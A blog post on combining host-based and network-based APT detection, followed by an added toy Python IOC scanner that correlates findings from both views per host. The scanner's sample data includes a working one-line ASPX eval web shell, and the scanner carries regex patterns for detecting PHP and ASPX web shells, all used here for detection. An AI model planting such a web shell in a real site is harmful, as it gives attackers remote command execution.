Synergetic Effects of Network and Host Based APT Detection
Florian Roth, Nextron Systems, 27 October 2015
https://www.nextron-systems.com/2015/10/27/synergetic-effects-of-network-and-host-based-apt-detection/

People often ask me whether they still need our host-based scanner THOR now that they have bought a network appliance that already inspects all content entering and leaving their network. I normally answer that it is not a question of one solution versus the other, but of combining both to achieve the best possible result.

The two approaches apply different detection techniques because they analyze different elements and see an intrusion from different perspectives. A host-based scanner has a hard time detecting zero-day exploits, C2 back-connects and malicious content inside a network connection. In the same way it is difficult or impossible for a network-based solution to detect system anomalies, malware-less backdoors, web shells and the traces that hacking activity leaves in the Windows Event Log or the Registry: these artifacts exist only on the endpoint, and the traffic that created them may have been encrypted, may be long gone, or may have looked like ordinary administration while it was on the wire.

I collected the different aspects of advanced persistent threat protection in the following infographic. The colors (grey and aquamarine) indicate the coverage by each solution. The graphic is not based on research and may vary in specific cases; it is meant to roughly visualize the different perspectives and the high coverage you achieve by combining both solutions.

[Figure: Endpoint APT Detection and Network APT Detection (THOR_vs_NetworkAppliance.png, https://www.nextron-systems.com/wp-content/uploads/2015/10/THOR_vs_NetworkAppliance.png)]

I should add that we currently provide THOR only to a limited group of customers, mainly European corporations, government institutions and certain CSIRTs within the European Union. THOR's little brother LOKI (https://github.com/Neo23x0/LOKI) offers a much reduced feature set but may be enough, and FENRIR (https://github.com/Neo23x0/Fenrir) is a dependency-less IOC scanner for Unix-based target systems written in bash. For a Windows PowerShell solution check out Kansa (https://github.com/davehull/Kansa) by Dave Hull, which also allows running LOKI as a distributed scan.
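The following script is an added illustration of the two perspectives described above, written for this page; it is not code from the post, nor from THOR, LOKI, FENRIR or Kansa. The host side matches file hashes and web shell content and inspects Windows Event Log records (a service installed from a world-writable directory, an audit log that was cleared); the network side matches flow destinations against a C2 list; a final step correlates both views per host. Every indicator, file, event and flow record is constructed for the demo, and the destinations use the documentation ranges 203.0.113.0/24 and example.net, so nothing here points at real infrastructure.

```python
"""Toy two-perspective IOC scanner (added example; not THOR/LOKI/FENRIR/Kansa code).

Host side: known-bad file hashes, web shell content patterns and Event Log traces.
Network side: connections to known C2 destinations. The last step correlates both
views per host. Every indicator and sample record below is constructed for the demo."""
import hashlib
import re
from collections import defaultdict

# ---- constructed indicators (hypothetical; not from any real IOC feed) -----
# 203.0.113.0/24 and example.net are reserved for documentation, so none of this is real.
C2_DESTINATIONS = {"203.0.113.45", "update-check.example.net"}
WEBSHELL_PATTERNS = {
    "php_eval_request": re.compile(rb"eval\s*\(\s*\$_(?:POST|GET|REQUEST)\b"),
    "aspx_eval_request_item": re.compile(rb"eval\s*\(\s*Request\.Item\[", re.I),
}
DROPPER_BYTES = b"MZ\x90\x00constructed-dropper-sample"        # stands in for a known dropper
KNOWN_BAD_SHA256 = {hashlib.sha256(DROPPER_BYTES).hexdigest()}  # hash IOC derived from it
SUSPICIOUS_SERVICE_DIRS = ("c:\\windows\\temp\\", "c:\\users\\public\\")

# ---- constructed sample data: "host:path" -> content, Event Log records, flow records ----
FILES = {
    "web01:C:\\inetpub\\wwwroot\\default.aspx": b'<%@ Page Language="C#" %><html>ok</html>',
    "web01:C:\\inetpub\\wwwroot\\uploads\\img.aspx":
        b'<%@ Page Language="Jscript"%><%eval(Request.Item["c"],"unsafe");%>',
    "fs02:C:\\Users\\Public\\update.exe": DROPPER_BYTES,
    "db03:/var/www/html/index.php": b"<?php include 'app/bootstrap.php'; ?>",
}
EVENTS = [  # event_id 7045 = new service installed, 1102 = security audit log cleared
    {"host": "web01", "event_id": 7045, "image_path": "C:\\Windows\\Temp\\svch0st.exe"},
    {"host": "fs02", "event_id": 1102},
    {"host": "dc01", "event_id": 7045, "image_path": "C:\\Program Files\\Backup\\agent.exe"},
]
FLOWS = [
    {"src_host": "web01", "dst": "203.0.113.45", "dst_port": 443},
    {"src_host": "db03", "dst": "update-check.example.net", "dst_port": 80},
    {"src_host": "fs02", "dst": "192.0.2.10", "dst_port": 445},
]


def scan_files(files):
    """Host perspective: hash IOCs plus content patterns that only exist on disk."""
    findings = []
    for key, content in files.items():
        host, path = key.split(":", 1)
        if hashlib.sha256(content).hexdigest() in KNOWN_BAD_SHA256:
            findings.append((host, "file_hash", path))
        for name, pattern in WEBSHELL_PATTERNS.items():
            if pattern.search(content):
                findings.append((host, "webshell:" + name, path))
    return findings


def scan_events(events):
    """Host perspective: traces of hacking activity in the Windows Event Log."""
    findings = []
    for ev in events:
        if ev["event_id"] == 1102:
            findings.append((ev["host"], "eventlog:audit_log_cleared", ""))
        elif ev["event_id"] == 7045 and \
                ev.get("image_path", "").lower().startswith(SUSPICIOUS_SERVICE_DIRS):
            findings.append((ev["host"], "eventlog:service_from_writable_dir", ev["image_path"]))
    return findings


def scan_flows(flows):
    """Network perspective: a C2 back-connect seen at the perimeter, invisible to a disk scan."""
    return [(f["src_host"], "network:c2_destination", f"{f['dst']}:{f['dst_port']}")
            for f in flows if f["dst"] in C2_DESTINATIONS]


def correlate(host_findings, net_findings):
    """Merge both views per host; a host flagged from both sides deserves the first look."""
    per_host = defaultdict(lambda: {"host": [], "network": []})
    for host, kind, detail in host_findings:
        per_host[host]["host"].append((kind, detail))
    for host, kind, detail in net_findings:
        per_host[host]["network"].append((kind, detail))

    def verdict(entry):
        if entry["host"] and entry["network"]:
            return "both"
        return "host_only" if entry["host"] else "network_only"

    return {host: {"verdict": verdict(entry), **entry} for host, entry in per_host.items()}


def run_demo():
    """Run all three scans over the constructed data and return the correlated result."""
    return correlate(scan_files(FILES) + scan_events(EVENTS), scan_flows(FLOWS))


if __name__ == "__main__":
    for host, result in sorted(run_demo().items()):
        print(host, result["verdict"], result["host"], result["network"])
```

On the constructed data, web01 is flagged from both sides (an ASPX web shell and a service from C:\Windows\Temp on disk, a beacon to the C2 address on the wire), fs02 only on the host (known-bad hash and a cleared audit log; its SMB traffic carries no indicator), and db03 only on the network (clean files, but a connection to a C2 domain). Neither perspective alone would have produced that complete picture, which is the point of the post.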